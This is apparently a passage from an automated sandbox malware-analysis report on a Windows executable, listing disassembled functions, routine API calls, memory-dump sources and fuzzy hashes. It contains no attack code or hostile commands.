    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID: gj
    • API String ID: 0-4203073231
    • Opcode ID: 74292383cfc94c87c98b6a672e1bea4064e043574c4dda1b17590f3726c4a466
    • Instruction ID: 9e496bc2aebaf11641d1ad54ee3afacb3a9303d099cd51e5fd1860c12a349d30
    • Opcode Fuzzy Hash: 74292383cfc94c87c98b6a672e1bea4064e043574c4dda1b17590f3726c4a466
    • Instruction Fuzzy Hash: A9C137B2A183818FC754CF29D88065AFBE1BFC9308F19892DE998D7301D774E945CB96
    Function 00060B8D Relevance: 1.5, APIs: 1, Instructions: 3COMMON
    Download Yara Rule
    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_00020BA0,000605F5), ref: 00060B92
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled
    • String ID:
    • API String ID: 3192549508-0
    • Opcode ID: 964f45a0c9b5822250ca4ab369aea16cc5a46108f9a816e05499f09612562224
    • Instruction ID: 42adbb7d59e565f07aa8472cd5d6fe0129eff76d09096a96030a8c42935197c1
    • Opcode Fuzzy Hash: 964f45a0c9b5822250ca4ab369aea16cc5a46108f9a816e05499f09612562224
    • Instruction Fuzzy Hash:
    Function 0006D1E0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: HeapProcess
    • String ID:
    • API String ID: 54951025-0
    • Opcode ID: 233aa3935aeb6e3bc9c2612704e5aabb84fad791b33b1771d2c25e70c645c3de
    • Instruction ID: 1d48c8b7e008e315393694275995e67651a66b91414659644fbac660a9844651
    • Opcode Fuzzy Hash: 233aa3935aeb6e3bc9c2612704e5aabb84fad791b33b1771d2c25e70c645c3de
    • Instruction Fuzzy Hash: 9EA01130A022808BA3008F3AAA0820C3AA8AB832803008028A008C0230EB2C80A08A02
    Function 0005741E Relevance: .8, Instructions: 807COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2d6d7b90b0f167eb106e84e75b72c36f6dee5b774374e5313e1240face5eb564
    • Instruction ID: dd875abbbebf7334932006d39b9c1234c4d77b081b751a16bf8a4866dafdd989
    • Opcode Fuzzy Hash: 2d6d7b90b0f167eb106e84e75b72c36f6dee5b774374e5313e1240face5eb564
    • Instruction Fuzzy Hash: BF620671608B858FCB29CF38D4906FA7BE1AF95305F18896DDD9E8B342D730A949DB10
    Function 0005889F Relevance: .8, Instructions: 781COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: ceb54f0b1270e70b00e006b9306f911088e896e5099abdc2083c34249c5c05d7
    • Instruction ID: 51d9c2500d3d26a17f4c9fa5170b32aaee7495a02f1b78f4622cfee73b8d3b97
    • Opcode Fuzzy Hash: ceb54f0b1270e70b00e006b9306f911088e896e5099abdc2083c34249c5c05d7
    • Instruction Fuzzy Hash: 6562F371608285DFCB18CF28C4905BABBE1BF95305F08C66DEC9A9B346DB30E949DB51
    Function 000507A0 Relevance: .7, Instructions: 694COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: bd9e78f3eedb31a401d47d299b8af698bf32d54c623d11bd157ec233ddef8b59
    • Instruction ID: 360215021af0b230c8343d87ebc03e56bc95c7f790d6035b67a57f6fe8af0972
    • Opcode Fuzzy Hash: bd9e78f3eedb31a401d47d299b8af698bf32d54c623d11bd157ec233ddef8b59
    • Instruction Fuzzy Hash: 00525B726187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B245D734EA19CB86
    Function 00058243 Relevance: .5, Instructions: 528COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 91e8c2cc69bb689b9757d067713bada0ef27a17d8b9a395615b8b6fda0309fb8
    • Instruction ID: b398232fe46c768332aef25bf3ef9f89327c6bbec91a1f08d432ce9daf2277c5
    • Opcode Fuzzy Hash: 91e8c2cc69bb689b9757d067713bada0ef27a17d8b9a395615b8b6fda0309fb8
    • Instruction Fuzzy Hash: E712D1B16047068FC728CF28C4947BAB7E0FB54305F10892DED9AD7681EB78E999CB05
    Function 0004D833 Relevance: .5, Instructions: 454COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: fa6659a1e80d34610ff060634c4cde721c7bdc45dd0b1bce4e52126885a01a9b
    • Instruction ID: 48bc1e87ac7c72e7b574885b9d47c89532fd52224a02ae2151723cd6754e8bd8
    • Opcode Fuzzy Hash: fa6659a1e80d34610ff060634c4cde721c7bdc45dd0b1bce4e52126885a01a9b
    • Instruction Fuzzy Hash: E4F1A9B1A083018FC764DF28C484A6EBBE5FFC9318F144A6EF4D597252D630E945CB4A
    Function 0004FCCC Relevance: .3, Instructions: 320COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 89795a0f3e80b7e574dadec12b93924dc3bedc48d2dcc7c280c7edb63a943df0
    • Instruction ID: 3176c957f430571c84b0086742ae89ab0c92f5d384bbb4edd2fe96bf60e5ecd9
    • Opcode Fuzzy Hash: 89795a0f3e80b7e574dadec12b93924dc3bedc48d2dcc7c280c7edb63a943df0
    • Instruction Fuzzy Hash: 9BE16C755183908FC304CF29D48046ABBF0BB9A300F9A496EFAD587352CB35EA15DF96
    Function 00055272 Relevance: .3, Instructions: 270COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: ba3de1ab45ae5c8f5f4579ae5924f9381ce7f15d2f6fcc5ff34ae3ece2457581
    • Instruction ID: d92f8c15649869e57a995d9c5da4c17aa1eadcca2adb320c4ed1893353f9a27e
    • Opcode Fuzzy Hash: ba3de1ab45ae5c8f5f4579ae5924f9381ce7f15d2f6fcc5ff34ae3ece2457581
    • Instruction Fuzzy Hash: 7F9133B0200B459BDB24EA64DCE5BFF77D5AB90307F10082DED9A87282EB64D98DC751
    Function 000555A0 Relevance: .2, Instructions: 243COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 68e6acee6c9f498f5e15989f60e614e6aa36cc50bb8c8e6a6afc36a9cff0e6f1
    • Instruction ID: 36b221f7955d5f3fe8e5c682a2e0b0572bb8192005bb5275acf2da52ac347111
    • Opcode Fuzzy Hash: 68e6acee6c9f498f5e15989f60e614e6aa36cc50bb8c8e6a6afc36a9cff0e6f1
    • Instruction Fuzzy Hash: 3E8138B1308B459BEB24DA28DCE5BBF37D59B94306F40092DED868B282DA60C8898755
    Function 000664C7 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: dc9b7f03efae9519355111b5d0e437d93fe06e6636e3984223652807b5061c44
    • Instruction ID: 7063ea3c853f417ae29efc7ff65d75c178cbb080d9c48d20e63fecb38cd5cd40
    • Opcode Fuzzy Hash: dc9b7f03efae9519355111b5d0e437d93fe06e6636e3984223652807b5061c44
    • Instruction Fuzzy Hash: A9617BB1600F08A6DEB45A68E9A7BFE63CBEB41704F14051EF943DB286DA13DE418355
    Function 00066298 Relevance: .2, Instructions: 214COMMONLIBRARYCODE
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
    • Instruction ID: 48f85db92d066b7fb995a58a34f935b3a535755bcc44630f38d5764979b9e1c5
    • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
    • Instruction Fuzzy Hash: 59518A70600B5597DFB48E6889657FF67DB9B52300F18092EE842DB383CA17EF458356
    Function 000502F7 Relevance: .2, Instructions: 161COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 34f3d7a8df62df9c7df3776d5dd22dd6f03114b7033ce91934ffe9fa90963736
    • Instruction ID: b28959a7cf8355c8cc004171b97ab672787c896ea1a6483635164caea62a9fc6
    • Opcode Fuzzy Hash: 34f3d7a8df62df9c7df3776d5dd22dd6f03114b7033ce91934ffe9fa90963736
    • Instruction Fuzzy Hash: F051CE715093958BC752CF28C1805AFBFE4AF9A315F4A09A9E8D95B243C231DB4ECF52
    Function 000513F6 Relevance: .1, Instructions: 141COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 51e60fbdde86a4e3a97d7fdda07f96a97f4d4287334ef17bbb245ee3bac51cd0
    • Instruction ID: 25bce6f60c8b8c505a15a3cd1833d95ed0577b580bae83618c8d09e0c8973b67
    • Opcode Fuzzy Hash: 51e60fbdde86a4e3a97d7fdda07f96a97f4d4287334ef17bbb245ee3bac51cd0
    • Instruction Fuzzy Hash: AB51EFB1A087119FC748CF19D48055AF7E1FF88314F058A2EE899E3300DB34E959CB96
    Function 00055001 Relevance: .1, Instructions: 112COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
    • Instruction ID: 8f7be77572a20acdd1c6b9c05b895e7edf2350d1122ae91cc44447d0f357c2b4
    • Opcode Fuzzy Hash: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
    • Instruction Fuzzy Hash: 8D31E5B5604B068FC714DF28CCA12ABBBD0EB95302F10492DE896C7742C735E909CF95
    Function 0005D872 Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 0005D877
      • Part of subcall function 0005C4F4: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0005C5DB
    • _wcslen.LIBCMT ref: 0005DB3D
    • _wcslen.LIBCMT ref: 0005DB46
    • SetWindowTextW.USER32(?,?), ref: 0005DBA4
    • _wcslen.LIBCMT ref: 0005DBE6
    • _wcsrchr.LIBVCRUNTIME ref: 0005DD2E
    • GetDlgItem.USER32(?,00000066), ref: 0005DD69
    • SetWindowTextW.USER32(00000000,?), ref: 0005DD79
    • SendMessageW.USER32(00000000,00000143,00000000,0009389A), ref: 0005DD87
    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0005DDB2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
    • API String ID: 2804936435-312220925
    • Opcode ID: 864c9ff0a9bed3053c9abb4ec52c6940425365fad2e81e4528cc319da328326f
    • Instruction ID: b7920c66dec553d14182e35e7c79542f8c2a82c0e17ebaa4a86c4b8cb25bc607
    • Opcode Fuzzy Hash: 864c9ff0a9bed3053c9abb4ec52c6940425365fad2e81e4528cc319da328326f
    • Instruction Fuzzy Hash: A3E15272900658AADB24DBA0DC85EEF77FCEB05311F5440A6FA49E7051EB749F88CB60
    Function 0004F608 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
    Download Yara Rule
    APIs
    • _swprintf.LIBCMT ref: 0004F62E
      • Part of subcall function 00044A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A33
      • Part of subcall function 000530E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00083070,00000200,0004EC48,00000000,?,00000050,00083070), ref: 00053102
    • _strlen.LIBCMT ref: 0004F64F
    • SetDlgItemTextW.USER32(?,00080274,?), ref: 0004F6AF
    • GetWindowRect.USER32(?,?), ref: 0004F6E9
    • GetClientRect.USER32(?,?), ref: 0004F6F5
    • GetWindowLongW.USER32(?,000000F0), ref: 0004F795
    • GetWindowRect.USER32(?,?), ref: 0004F7C2
    • SetWindowTextW.USER32(?,?), ref: 0004F7FB
    • GetSystemMetrics.USER32(00000008), ref: 0004F803
    • GetWindow.USER32(?,00000005), ref: 0004F80E
    • GetWindowRect.USER32(00000000,?), ref: 0004F83B
    • GetWindow.USER32(00000000,00000002), ref: 0004F8AD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
    • String ID: $%s:$CAPTION$d
    • API String ID: 2407758923-2512411981
    • Opcode ID: 38ac81b79ffeddfcb476ba11cddfc2ab528f25f0e476b9b6ed070ed220efb868
    • Instruction ID: 370ee9947085aec2ca33816376c436a70d200422c1395369c791d56be3b9ee34
